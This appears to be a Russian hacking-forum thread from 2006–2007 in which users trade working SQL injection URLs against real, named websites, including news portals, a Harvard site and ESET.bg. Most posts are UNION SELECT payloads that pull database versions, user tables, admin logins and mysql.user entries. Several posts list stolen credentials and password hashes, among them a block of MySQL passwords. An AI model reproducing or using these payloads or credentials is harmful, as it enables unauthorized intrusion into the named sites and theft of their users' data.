SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. BlackCats

    BlackCats Elder - Старейшина

    Joined:
    1 Feb 2006
    Messages:
    642
    Likes Received:
    630
    Reputations:
    -3
    ы
    ы
     
  2. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    http://www.nasheradio.net

    Code:
    http://www.nasheradio.net/news2.php?id=1'+union+select+1,concat(user(),char(%20%2058),database(),char(58),version()),3,4,5,6,7,8,9,1%20%200,11,12/*

    http://www.promtractor.ru

    Code:
    http://www.promtractor.ru/products_show.php?section=-1+union+select+1,2,version(),4/*
     
    1 person likes this.
  3. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.presscenter.kz/index.php?show=news&id=-1+union+select+1,2,convert(concat(database(),char(58),user(),char(58),version()),char),4,5,6,7,8,9/*
    http://www.presscenter.kz/index.php?show=news&id=-1+union+select+1,2,convert(table_name,char),4,5,6,7,8,9+from+information_schema.tables+limit+19,1/*
    http://www.presscenter.kz/index.php?show=news&id=-1+union+select+1,2,concat(autorID,char(58),name,char(58),email,char(58),description,char(58),photo,char(58),positions),4,5,6,7,8,9+from+news_autors+limit+0,1/*
     
    1 person likes this.
  4. 0rt

    0rt New Member

    Joined:
    1 Feb 2007
    Messages:
    2
    Likes Received:
    2
    Reputations:
    0
    Code:
    http://www.kreschatic.kiev.ua/?id=3057+union+se lect+1,concat(user,p assword)+from+my sql.user/*
    http://www.sistema. kz/?start=product&id= -1+union+select+1,password,login,4,5+from+admin+limit+0,1/*
    http://www.aquaclub.cz/ article.php?id=-1+union+select+1,2,3, 4,5,6,7,8,9,concat(user(),char(58),version()),11+from+INFORMATION_SCHEMA.TABLES/*
    http://searchmonster. org/index.php?l=-1+union+select+1,2,3,user,password ,6+from+mysql.user/*
    
     
    #2244 0rt, 20 May 2007
    Last edited: 20 May 2007
    1 person likes this.
  5. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql

    http://hachoo.ru/ Дарить и получать подарки!

    уязвимость: http://hachoo.ru/tag.php?tag=130'
    таблицы и поля: user (login,password,email)
    842 записи
    root:f5d7e2532cc9ad16bc2a41222d76f269: business
     
    3 people like this.
  6. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Code:
    http://www.asinfo.com.ua/azov/az_forum_mess.php?id=-10+union+select+concat(user(),0x3a,version(),0x3a,database()),2/*&pg=
    Code:
    http://www.asinfo.com.ua/azov/az_forum_mess.php?id=-10+union+select+concat(name,0x3a,email),2+from+gbook/*&pg=
    нашел одну таблицу: news

    Code:
    http://www.dosug.zp.ua/?go=ob&vidb=-1+union+select+email,url,3,icq,gorod,6,7,8+from+members/*
    также вместо email/url/icq/gorod/ - можно подставить about/profession/education/lookinginfo

    Code:
    http://www.nhia.edu/news.php?id=-13+union+select+1,2,3,convert(concat(user(),0x3a,version(),0x3a,database())+using+latin1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+news/*
    thank ettee(соучастник)
     
    #2246 KPOT_f!nd, 20 May 2007
    Last edited: 20 May 2007
    1 person likes this.
  7. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql

    http://www.color-foto.com/
     
  8. Dracula4ever

    Dracula4ever Elder - Старейшина

    Joined:
    8 May 2006
    Messages:
    418
    Likes Received:
    183
    Reputations:
    26
    http://www.sofiacityguide.com

    Code:
    http://www.sofiacityguide.com/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
    

    http://www.pizzamarketplace.com

    Code:
    http://www.pizzamarketplace.com/article.php?id=-1+union+select+version(),2,3,4,5,6,7,8/*
    
     
  9. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    sql

    скулечка

    http://www.safemaster.ru/
    admins(login,pass)
    пасы открытые:
    admin:3362278811
    админка
     
    1 person likes this.
  10. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://krolik.ru/sex/list.php?tid=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
    http://krolik.ru/sex/list.php?tid=-1+union+select+1,concat(id,char(58),name,char(58),pass,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+autors+limit+600,1/*
     
    3 people like this.
  11. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Code:
    http://www.towardspakistan.com/profile.php?u_id=-365%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14/*
    Code:
    http://www.team-telefragged.de/user.php?id=2%20union%20select%201,2,3,4,5,6,7,8,9,0,11,12/*
    Code:
    http://www.sudokucraving.com/user.php?id=-1+UNION+SELECT+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15/*
    Code:
    http://writers-pen.com/user.php?id=-1%20union%20select%201,2,3,4,5,6,database(),8,9,0,11%20from%20users/*
    __:)__
     
    2 people like this.
  12. ЛифчиС5СВ

    ЛифчиС5СВ Elder - Старейшина

    Joined:
    9 Mar 2007
    Messages:
    164
    Likes Received:
    141
    Reputations:
    12
    http://maz.by.kz
    Code:
    http://maz.by.kz/index.php?text_section_id=-1+union+select+concat(user(),0x3a,version())
     
    2 people like this.
  13. maxster

    maxster Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    188
    Likes Received:
    88
    Reputations:
    -7
    Вот набралось !
    Code:
    http://www.bengaldens.com/detail_all.php?id=-11+UNION+SELECT+1,2,VERSION(),4,5,6,7,USER(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65/*
    http://www.smdailyjournal.com/article_preview.php?id=-11+UNION+SELECT+1,2,VERSION(),USER(),5,DATABASE(),7,8,9,10,11,12,13,14/*
    http://www.wilsonelectronics.com/ViewProduct.php?ID=-111+UNION+SELECT+1,2,3,4,USER(),6,7,8,9,10,11,12,13,14,15,16,17,18/*
    http://www.transbuddha.com/mediaHolder.php?id=-11+UNION+SELECT+VERSION(),2,3,4,5,6,7/*
    http://www.numberonecarsupermarket.co.uk/car.php?id=-111+UNION+SELECT+1,2,3,4,5,6,7,8,9,10/*
    
    ESET.bg
    Code:
    http://www.eset.bg/main.php?id=38&virusID=-111+UNION+SELECT+1,2,3,4,5,6,7,8/*
    
    USER() : root

    MySQL password:

    root:44d3e5527af27974
    debian-sys-maint:3c795ac1761bf029
    hordemgr:wEb_pas
    phpbb:bBn0D
    dspam:!dsmaP0
    linkos:l1nkn0d
    phpnod:fn0dpHp
    phpbb2:fn0dbB
    smfnod:fn0dsM
    root:wEb_pas
    otrs:wEb_pas
     
    1 person likes this.
  14. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.guzhelya.com/news.php?n=-1+union+select+1,concat(database(),char(58),user(),char(58),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
     
    1 person likes this.
  15. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    //несколько скулей от меня//

    Sysnet.it
    Code:
    http://www.sysnet.it/system/news-dettaglio-system.php?id=-
    21+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,concat(user(),char(58),database()),15,16/*
    Gayleague.com
    Code:
    http://www.gayleague.com/studio/fanfic/intro.php?id=-22+union+select+1,version(),3,database(),5,6,7,8,9,10/*
     
    1 person likes this.
  16. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    edu ;)

    HARVARD
    www.researchmatters.harvard.edu

    Code:
    http://www.researchmatters.harvard.edu/story.php?article_id=-1+union+select+convert(concat(version(),char(58),user(),char(58),database()),char),2,3,4,5,6,7,8,9,10,11,12,13/*
     
    2 people like this.
  17. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Их служба и опасна и трудна и на первый взгляд как будьто не видна
    Code:
    http://02.ru/news/index.php?id_tn=5&podr=1&id_n=-553%20union%20select%201,2,3,4,5,6,7/*
     
    3 people like this.
  18. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    =)))) Всех излечит, исцелит Добрый доктор Айболит!
    Code:
    http://www.03.ru/ill/ill_show.shtml?action=detail&ID=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6/*
     
    2 people like this.
  19. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.zagran.kiev.ua/article.php?new=195&idart=-1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15/*
    http://www.zagran.kiev.ua/article.php?new=195&idart=-1+union+select+1,2,3,4,5,6,7,concat(username,char(58),user_password),9,10,11,12,13,14,15+from+phpbb_users+limit+1,1/*
     
    1 person likes this.
  20. Серенький

    Joined:
    13 Apr 2007
    Messages:
    112
    Likes Received:
    145
    Reputations:
    83
    milan champion!!!

    Милан Чемпион!!!
     
    1 person likes this.
Thread Status:
Not open for further replies.